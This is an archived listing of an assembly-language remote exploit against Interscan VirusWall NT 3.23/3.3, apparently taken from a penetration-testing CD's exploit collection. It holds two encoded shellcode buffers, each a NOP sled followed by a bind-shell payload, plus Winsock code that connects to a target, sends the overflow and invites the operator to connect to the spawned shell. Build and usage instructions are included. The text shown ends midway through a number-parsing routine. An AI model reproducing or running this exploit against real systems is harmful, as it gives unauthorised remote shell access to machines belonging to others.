home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / antivirus / interscan / vwxploit.asm.txt < prev    next >
Text File  |  2005-02-12  |  21KB  |  603 lines
  1. ; Interscan VirusWall 3.23/3.3 remote.
  2. ;
  3. ; The binary is available at http://www.beavuh.org.
  4. ;
  5. ; To assemble:
  6. ;
  7. ; tasm32 -ml vwxploit.asm
  8. ; tlink32 -Tpe -c -x vwxploit.obj ,,, import32
  9. ;
  10. ; TASM 5 required!
  11. ;
  12. ; dark spyrit <dspyrit@beavuh.org>
  13.  
  14.  
  15. .386p
  16. locals
  17. jumps
  18. .model flat, stdcall
  19.  
  20.  
  21. extrn GetCommandLineA:PROC
  22. extrn GetStdHandle:PROC
  23. extrn WriteConsoleA:PROC
  24. extrn ExitProcess:PROC
  25. extrn WSAStartup:PROC
  26. extrn connect:PROC
  27. extrn send:PROC
  28. extrn recv:PROC
  29. extrn WSACleanup:PROC
  30. extrn gethostbyname:PROC
  31. extrn htons:PROC
  32. extrn socket:PROC
  33. extrn inet_addr:PROC
  34. extrn closesocket:PROC
  35. extrn Sleep:PROC
  36.  
  37. .data
  38.  
  39. sploit_length323                equ     1314
  40.  
  41. sploit323:
  42.  db 068h, 065h, 06ch, 06fh, 020h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  43.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  44.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  45.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  46.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  47.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  48.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  49.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  50.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  51.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  52.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  53.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  54.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  55.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  56.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  57.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  58.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  59.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  60.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  61.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  62.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  63.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  64.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  65.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  66.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  67.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  68.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  69.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  70.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  71.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  72.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  73.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  74.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  75.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  76.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  77.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  78.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  79.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  80.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  81.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  82.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  83.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  84.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  85.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  86.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  87.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  88.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  89.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  90.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  91.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  92.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  93.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  94.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  95.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  96.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  97.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  98.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  99.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  100.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  101.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  102.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  103.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  104.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  105.  db 090h, 090h, 090h, 090h, 090h, 0bbh, 010h, 00bh, 011h, 001h, 0c1h, 0ebh
  106.  db 002h, 08bh, 0f8h, 033h, 0c0h, 050h, 048h, 090h, 050h, 059h, 0f2h, 0afh
  107.  db 059h, 0b1h, 0c6h, 08bh, 0c7h, 048h, 080h, 030h, 099h, 0e2h, 0fah, 033h
  108.  db 0f6h, 096h, 090h, 090h, 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h
  109.  db 0b1h, 00bh, 049h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h
  110.  db 056h, 052h, 066h, 0bbh, 034h, 043h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h
  111.  db 0ech, 032h, 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 066h, 0bbh, 0c4h, 042h
  112.  db 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 006h, 032h, 0c0h
  113.  db 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h, 066h, 0bbh, 034h
  114.  db 043h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 083h, 0c6h, 005h, 033h
  115.  db 0c0h, 050h, 040h, 050h, 040h, 050h, 0ffh, 057h, 0e8h, 093h, 06ah, 010h
  116.  db 056h, 053h, 0ffh, 057h, 0ech, 06ah, 002h, 053h, 0ffh, 057h, 0f0h, 033h
  117.  db 0c0h, 057h, 050h, 0b0h, 00ch, 0abh, 058h, 0abh, 040h, 0abh, 05fh, 048h
  118.  db 050h, 057h, 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 050h, 057h, 0adh
  119.  db 056h, 0adh, 056h, 0ffh, 057h, 0c0h, 048h, 0b0h, 044h, 089h, 007h, 057h
  120.  db 0ffh, 057h, 0c4h, 033h, 0c0h, 08bh, 046h, 0f4h, 089h, 047h, 03ch, 089h
  121.  db 047h, 040h, 08bh, 006h, 089h, 047h, 038h, 033h, 0c0h, 066h, 0b8h, 001h
  122.  db 001h, 089h, 047h, 02ch, 057h, 057h, 033h, 0c0h, 050h, 050h, 050h, 040h
  123.  db 050h, 048h, 050h, 050h, 0adh, 056h, 033h, 0c0h, 050h, 0ffh, 057h, 0c8h
  124.  db 0ffh, 076h, 0f0h, 0ffh, 057h, 0cch, 0ffh, 076h, 0fch, 0ffh, 057h, 0cch
  125.  db 048h, 050h, 050h, 053h, 0ffh, 057h, 0f4h, 08bh, 0d8h, 033h, 0c0h, 0b4h
  126.  db 004h, 050h, 0c1h, 0e8h, 004h, 050h, 0ffh, 057h, 0d4h, 08bh, 0f0h, 033h
  127.  db 0c0h, 08bh, 0c8h, 0b5h, 004h, 050h, 050h, 057h, 051h, 050h, 0ffh, 077h
  128.  db 0a8h, 0ffh, 057h, 0d0h, 083h, 03fh, 001h, 07ch, 022h, 033h, 0c0h, 050h
  129.  db 057h, 0ffh, 037h, 056h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0dch, 00bh, 0c0h
  130.  db 074h, 02fh, 033h, 0c0h, 050h, 0ffh, 037h, 056h, 053h, 0ffh, 057h, 0f8h
  131.  db 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0c8h, 033h, 0c0h, 050h, 0b4h, 004h
  132.  db 050h, 056h, 053h, 0ffh, 057h, 0fch, 057h, 033h, 0c9h, 051h, 050h, 056h
  133.  db 0ffh, 077h, 0ach, 0ffh, 057h, 0d8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh
  134.  db 0aah, 050h, 0ffh, 057h, 0e4h, 090h, 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h
  135.  db 0aah, 0abh, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h
  136.  db 0fch, 099h, 0deh, 0fch, 0edh, 0cah, 0edh, 0f8h, 0ebh, 0edh, 0ech, 0e9h
  137.  db 0d0h, 0f7h, 0ffh, 0f6h, 0d8h, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch
  138.  db 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 0d8h, 099h, 0dah, 0f5h, 0f6h
  139.  db 0eah, 0fch, 0d1h, 0f8h, 0f7h, 0fdh, 0f5h, 0fch, 099h, 0c9h, 0fch, 0fch
  140.  db 0f2h, 0d7h, 0f8h, 0f4h, 0fch, 0fdh, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh
  141.  db 0f5h, 0f6h, 0fbh, 0f8h, 0f5h, 0d8h, 0f5h, 0f5h, 0f6h, 0fah, 099h, 0ceh
  142.  db 0ebh, 0f0h, 0edh, 0fch, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cbh, 0fch, 0f8h
  143.  db 0fdh, 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cah, 0f5h, 0fch, 0fch, 0e9h, 099h
  144.  db 0dch, 0e1h, 0f0h, 0edh, 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h
  145.  db 0ceh, 0cah, 0d6h, 0dah, 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah, 0f2h
  146.  db 0fch, 0edh, 099h, 0fbh, 0f0h, 0f7h, 0fdh, 099h, 0f5h, 0f0h, 0eah, 0edh
  147.  db 0fch, 0f7h, 099h, 0f8h, 0fah, 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch
  148.  db 0f7h, 0fdh, 099h, 0ebh, 0fch, 0fah, 0efh, 099h, 09bh, 099h 
  149.  store dw ?
  150.  db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h
  151.  db 0fah, 0f4h, 0fdh, 0b7h, 0fch, 0e1h, 0fch, 099h, 0ffh, 0ffh, 0ffh, 0ffh
  152.  db 060h, 045h, 042h, 000h, 00dh, 00ah  
  153.  
  154. sploit_length33         equ     794
  155.  
  156. sploit33:
  157.  db 068h, 065h, 06ch, 06fh, 020h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  158.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  159.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  160.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  161.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  162.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  163.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  164.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  165.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  166.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  167.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  168.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  169.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  170.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  171.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  172.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  173.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  174.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  175.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h
  176.  db 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 090h, 04bh, 08bh
  177.  db 0c3h, 0bbh, 001h, 090h, 016h, 001h, 0c1h, 0ebh, 002h, 08bh, 0f8h, 033h
  178.  db 0c0h, 050h, 048h, 090h, 050h, 059h, 0f2h, 0afh, 059h, 0b1h, 0c6h, 08bh
  179.  db 0c7h, 048h, 080h, 030h, 099h, 0e2h, 0fah, 033h, 0f6h, 096h, 090h, 090h
  180.  db 056h, 0ffh, 013h, 08bh, 0d0h, 0fch, 033h, 0c9h, 0b1h, 00bh, 049h, 032h
  181.  db 0c0h, 0ach, 084h, 0c0h, 075h, 0f9h, 052h, 051h, 056h, 052h, 0b3h, 080h
  182.  db 090h, 090h, 0ffh, 013h, 0abh, 059h, 05ah, 0e2h, 0ech, 032h, 0c0h, 0ach
  183.  db 084h, 0c0h, 075h, 0f9h, 0b3h, 001h, 04bh, 090h, 056h, 0ffh, 013h, 08bh
  184.  db 0d0h, 0fch, 033h, 0c9h, 0b1h, 006h, 032h, 0c0h, 0ach, 084h, 0c0h, 075h
  185.  db 0f9h, 052h, 051h, 056h, 052h, 0b3h, 080h, 090h, 090h, 0ffh, 013h, 0abh
  186.  db 059h, 05ah, 0e2h, 0ech, 083h, 0c6h, 005h, 033h, 0c0h, 050h, 040h, 050h
  187.  db 040h, 050h, 0ffh, 057h, 0e8h, 093h, 06ah, 010h, 056h, 053h, 0ffh, 057h
  188.  db 0ech, 06ah, 002h, 053h, 0ffh, 057h, 0f0h, 033h, 0c0h, 057h, 050h, 0b0h
  189.  db 00ch, 0abh, 058h, 0abh, 040h, 0abh, 05fh, 048h, 050h, 057h, 056h, 0adh
  190.  db 056h, 0ffh, 057h, 0c0h, 048h, 050h, 057h, 0adh, 056h, 0adh, 056h, 0ffh
  191.  db 057h, 0c0h, 048h, 0b0h, 044h, 089h, 007h, 057h, 0ffh, 057h, 0c4h, 033h
  192.  db 0c0h, 08bh, 046h, 0f4h, 089h, 047h, 03ch, 089h, 047h, 040h, 08bh, 006h
  193.  db 089h, 047h, 038h, 033h, 0c0h, 066h, 0b8h, 001h, 001h, 089h, 047h, 02ch
  194.  db 057h, 057h, 033h, 0c0h, 050h, 050h, 050h, 040h, 050h, 048h, 050h, 050h
  195.  db 0adh, 056h, 033h, 0c0h, 050h, 0ffh, 057h, 0c8h, 0ffh, 076h, 0f0h, 0ffh
  196.  db 057h, 0cch, 0ffh, 076h, 0fch, 0ffh, 057h, 0cch, 048h, 050h, 050h, 053h
  197.  db 0ffh, 057h, 0f4h, 08bh, 0d8h, 033h, 0c0h, 0b4h, 004h, 050h, 0c1h, 0e8h
  198.  db 004h, 050h, 0ffh, 057h, 0d4h, 08bh, 0f0h, 033h, 0c0h, 08bh, 0c8h, 0b5h
  199.  db 004h, 050h, 050h, 057h, 051h, 050h, 0ffh, 077h, 0a8h, 0ffh, 057h, 0d0h
  200.  db 083h, 03fh, 001h, 07ch, 022h, 033h, 0c0h, 050h, 057h, 0ffh, 037h, 056h
  201.  db 0ffh, 077h, 0a8h, 0ffh, 057h, 0dch, 00bh, 0c0h, 074h, 02fh, 033h, 0c0h
  202.  db 050h, 0ffh, 037h, 056h, 053h, 0ffh, 057h, 0f8h, 06ah, 050h, 0ffh, 057h
  203.  db 0e0h, 0ebh, 0c8h, 033h, 0c0h, 050h, 0b4h, 004h, 050h, 056h, 053h, 0ffh
  204.  db 057h, 0fch, 057h, 033h, 0c9h, 051h, 050h, 056h, 0ffh, 077h, 0ach, 0ffh
  205.  db 057h, 0d8h, 06ah, 050h, 0ffh, 057h, 0e0h, 0ebh, 0aah, 050h, 0ffh, 057h
  206.  db 0e4h, 090h, 0d2h, 0dch, 0cbh, 0d7h, 0dch, 0d5h, 0aah, 0abh, 099h, 0dah
  207.  db 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0fch
  208.  db 0edh, 0cah, 0edh, 0f8h, 0ebh, 0edh, 0ech, 0e9h, 0d0h, 0f7h, 0ffh, 0f6h
  209.  db 0d8h, 099h, 0dah, 0ebh, 0fch, 0f8h, 0edh, 0fch, 0c9h, 0ebh, 0f6h, 0fah
  210.  db 0fch, 0eah, 0eah, 0d8h, 099h, 0dah, 0f5h, 0f6h, 0eah, 0fch, 0d1h, 0f8h
  211.  db 0f7h, 0fdh, 0f5h, 0fch, 099h, 0c9h, 0fch, 0fch, 0f2h, 0d7h, 0f8h, 0f4h
  212.  db 0fch, 0fdh, 0c9h, 0f0h, 0e9h, 0fch, 099h, 0deh, 0f5h, 0f6h, 0fbh, 0f8h
  213.  db 0f5h, 0d8h, 0f5h, 0f5h, 0f6h, 0fah, 099h, 0ceh, 0ebh, 0f0h, 0edh, 0fch
  214.  db 0dfh, 0f0h, 0f5h, 0fch, 099h, 0cbh, 0fch, 0f8h, 0fdh, 0dfh, 0f0h, 0f5h
  215.  db 0fch, 099h, 0cah, 0f5h, 0fch, 0fch, 0e9h, 099h, 0dch, 0e1h, 0f0h, 0edh
  216.  db 0c9h, 0ebh, 0f6h, 0fah, 0fch, 0eah, 0eah, 099h, 0ceh, 0cah, 0d6h, 0dah
  217.  db 0d2h, 0aah, 0abh, 099h, 0eah, 0f6h, 0fah, 0f2h, 0fch, 0edh, 099h, 0fbh
  218.  db 0f0h, 0f7h, 0fdh, 099h, 0f5h, 0f0h, 0eah, 0edh, 0fch, 0f7h, 099h, 0f8h
  219.  db 0fah, 0fah, 0fch, 0e9h, 0edh, 099h, 0eah, 0fch, 0f7h, 0fdh, 099h, 0ebh
  220.  db 0fch, 0fah, 0efh, 099h, 09bh, 099h 
  221.  store2 dw ? 
  222.  db 099h, 099h, 099h, 099h
  223.  db 099h, 099h, 099h, 099h, 099h, 099h, 099h, 099h, 0fah, 0f4h, 0fdh, 0b7h
  224.  db 0fch, 0e1h, 0fch, 099h, 0ffh, 0ffh, 0ffh, 0ffh, 009h, 01fh, 040h, 000h
  225.  db 00dh, 00ah  
  226.  
  227.  
  228. logo  db "Interscan VirusWall NT 3.23/3.3 remote - http://www.beavuh.org for nfo.", 13, 10
  229.       db "by dark spyrit <dspyrit@beavuh.org>",13,10,13,10
  230.       db "usage: vwxploit <host> <port> <port to bind shell> <version>", 13, 10
  231.       db "eg - vwxploit host.com 25 1234 3.23",13,10,0
  232.       logolen equ $-logo
  233.  
  234.  
  235. errorinit db 10,"error initializing winsock.", 13, 10, 0
  236. errorinitl equ $-errorinit
  237.  
  238. derror  db 10,"error.",13,10,0
  239. derrorl equ $-derror
  240.  
  241. nohost db 10,"no host or ip specified.", 13,10,0
  242. nohostl equ $-nohost
  243.  
  244. noport db 10,"no port specified.",13,10,0
  245. noportl equ $-noport
  246.  
  247. no_port2 db 10,"no bind port specified.",13,10,0
  248. no_port2l equ $-no_port2
  249.  
  250. response db 10,"waiting for response....",13,10,0
  251. respl   equ $-response
  252.  
  253. reshost db 10,"error resolving host.",13,10,0
  254. reshostl equ $-reshost
  255.  
  256. sockerr db 10,"error creating socket.",13,10,0
  257. sockerrl equ $-sockerr
  258.  
  259. ipill   db 10,"ip error.",13,10,0
  260. ipilll   equ $-ipill
  261.  
  262. cnerror db 10,"error establishing connection.",13,10,0
  263. cnerrorl equ $-cnerror
  264.  
  265. success db 10,"sent.. spawn connection now.",13,10,0
  266. successl equ $-success
  267.  
  268. verzion db 10,"please specify a valid version.",13,10,0
  269. verzionl equ $-verzion
  270.  
  271. console_in      dd      ?
  272. console_out     dd      ?
  273. bytes_read      dd      ?
  274.  
  275. wsadescription_len equ 256
  276. wsasys_status_len equ 128
  277.  
  278. WSAdata struct
  279. wVersion dw ?
  280. wHighVersion dw ?
  281. szDescription db wsadescription_len+1 dup (?)
  282. szSystemStatus db wsasys_status_len+1 dup (?)
  283. iMaxSockets dw ?
  284. iMaxUdpDg dw ?
  285. lpVendorInfo dw ?
  286. WSAdata ends
  287.  
  288. sockaddr_in struct
  289. sin_family dw ?
  290. sin_port dw ?
  291. sin_addr dd ?
  292. sin_zero db 8 dup (0)
  293. sockaddr_in ends
  294.  
  295. wsadata WSAdata <?>
  296. sin sockaddr_in <?>
  297. sock dd ?
  298. numbase dd 10
  299. version db 0
  300. _port db 256 dup (?)
  301. _host db 256 dup (?)
  302. _port2 db 256 dup (?)
  303. buffer db 1000 dup (0)
  304.  
  305. .code
  306. start:
  307.  
  308.     call    init_console
  309.     push    logolen
  310.     push    offset logo
  311.     call    write_console
  312.  
  313.     call    GetCommandLineA
  314.     mov     edi, eax
  315.     mov     ecx, -1
  316.     xor     al, al
  317.     push    edi
  318.     repnz   scasb
  319.     not     ecx
  320.     pop     edi
  321.     mov     al, 20h
  322.     repnz   scasb
  323.     dec     ecx
  324.     cmp     ch, 0ffh
  325.     jz      @@0
  326.     test    ecx, ecx
  327.     jnz     @@1
  328. @@0:        
  329.     push    nohostl
  330.     push    offset nohost
  331.     call    write_console
  332.     jmp     quit3
  333. @@1:
  334.     mov     esi, edi
  335.     lea     edi, _host
  336.     call    parse
  337.     or      ecx, ecx
  338.     jnz     @@2
  339.     push    noportl
  340.     push    offset noport
  341.     call    write_console
  342.     jmp     quit3
  343. @@2:
  344.     lea     edi, _port
  345.     call    parse
  346.     or      ecx, ecx
  347.     jnz     @@3
  348.     push    no_port2l
  349.     push    offset no_port2
  350.     call    write_console
  351.     jmp     quit3
  352.  
  353. @@3:
  354.     push    ecx
  355.     lea     edi, _port2
  356.     call    parse
  357.  
  358.     cmp     dword ptr [esi], "32.3"
  359.     jz      ver1
  360.     cmp     word ptr [esi+1], "3."
  361.     jz      ver2
  362.  
  363.     push    verzionl
  364.     push    offset verzion
  365.     call    write_console
  366.     jmp     quit3
  367.  
  368. ver1:
  369.     inc     version
  370. ver2:
  371.     push    offset wsadata
  372.     push    0101h
  373.     call    WSAStartup
  374.     or      eax, eax
  375.     jz      winsock_found
  376.  
  377.     push    errorinitl
  378.     push    offset errorinit
  379.     call    write_console
  380.     jmp     quit3
  381.  
  382. winsock_found:
  383.     xor     eax, eax
  384.     push    eax
  385.     inc     eax
  386.     push    eax
  387.     inc     eax
  388.     push    eax
  389.     call    socket
  390.     cmp     eax, -1
  391.     jnz     socket_ok
  392.  
  393.     push    sockerrl
  394.     push    offset sockerr
  395.     call    write_console
  396.     jmp     quit2
  397.  
  398. socket_ok:
  399.     mov     sock, eax
  400.     mov     sin.sin_family, 2
  401.     
  402.     mov     ebx, offset _port
  403.     call    str2num
  404.     mov     eax, edx
  405.     push    eax
  406.     call    htons
  407.     mov     sin.sin_port, ax
  408.     
  409.     mov     ebx, offset _port2
  410.     call    str2num
  411.     mov     eax, edx
  412.     push    eax
  413.     call    htons
  414.     xor     ax, 09999h
  415.     mov     store, ax
  416.     mov     store2, ax
  417.     mov     esi, offset _host
  418. lewp:
  419.     xor     al, al
  420.     lodsb
  421.     cmp     al, 039h
  422.     ja      gethost
  423.     test    al, al
  424.     jnz     lewp
  425.     push    offset _host
  426.     call    inet_addr
  427.     cmp     eax, -1
  428.     jnz     ip_aight
  429.     push    ipilll
  430.     push    offset ipill
  431.     call    write_console
  432.     jmp     quit1
  433.  
  434. ip_aight:
  435.     mov     sin.sin_addr, eax
  436.     jmp     continue
  437.  
  438. gethost:
  439.     push    offset _host
  440.     call    gethostbyname
  441.     test    eax, eax
  442.     jnz     gothost
  443.  
  444.     push    reshostl
  445.     push    offset reshost
  446.     call    write_console
  447.     jmp     quit1
  448.  
  449. gothost:
  450.     mov     eax, [eax+0ch]
  451.     mov     eax, [eax]
  452.     mov     eax, [eax]
  453.     mov     sin.sin_addr, eax
  454.  
  455. continue:
  456.     push    size sin
  457.     push    offset sin
  458.     push    sock
  459.     call    connect
  460.     or      eax, eax
  461.     jz      connect_ok
  462.     push    cnerrorl
  463.     push    offset cnerror
  464.     call    write_console
  465.     jmp     quit1
  466.  
  467. connect_ok:
  468.     push    respl
  469.     push    offset response
  470.     call    write_console
  471.     
  472.     xor     eax, eax
  473.     push    eax
  474.     push    1000
  475.     push    offset buffer
  476.     push    sock
  477.     call    recv
  478.     or      eax, eax
  479.     jg      sveet
  480.  
  481.     push    derrorl        
  482.     push    offset derror
  483.     call    write_console
  484.     jmp     quit1
  485.  
  486. sveet:        
  487.     push    eax
  488.     push    offset buffer
  489.     call    write_console
  490.  
  491.     cmp     version, 0
  492.     jz      shell2
  493.  
  494.     xor     eax, eax
  495.     push    eax
  496.     push    sploit_length323
  497.     push    offset sploit323
  498.     push    sock
  499.     jmp     blah        
  500. shell2:        
  501.     
  502.     xor     eax, eax
  503.     push    eax
  504.     push    sploit_length33
  505.     push    offset sploit33
  506.     push    sock
  507.  
  508. blah:        
  509.     call    send
  510.     
  511.     push    500
  512.     call    Sleep
  513.     
  514.     push    successl
  515.     push    offset success
  516.     call    write_console
  517.  
  518. quit1:
  519.     push    sock
  520.     call    closesocket
  521. quit2:
  522.     call    WSACleanup
  523. quit3:
  524.     push    0
  525.     call    ExitProcess
  526. parse   proc
  527. ;cheap parsing.. 
  528. lewp9:
  529.     xor     eax, eax
  530.     cld
  531.     lodsb
  532.     cmp     al, 20h
  533.     jz      done
  534.     test    al, al
  535.     jz      done2
  536.     stosb
  537.     dec     ecx
  538.     jmp     lewp9
  539. done:
  540.     dec     ecx
  541. done2:
  542.     ret
  543. endp
  544.  
  545. str2num proc
  546.     push    eax ecx edi
  547.     xor     eax, eax
  548.     xor     ecx, ecx
  549.     xor     edx, edx
  550.     xor     edi, edi
  551. lewp2:
  552.     xor     al, al
  553.     xlat
  554.     test    al, al
  555.     jz      end_it
  556.     sub     al, 030h
  557.     mov     cl, al
  558.     mov     eax, edx
  559.     mul     numbase
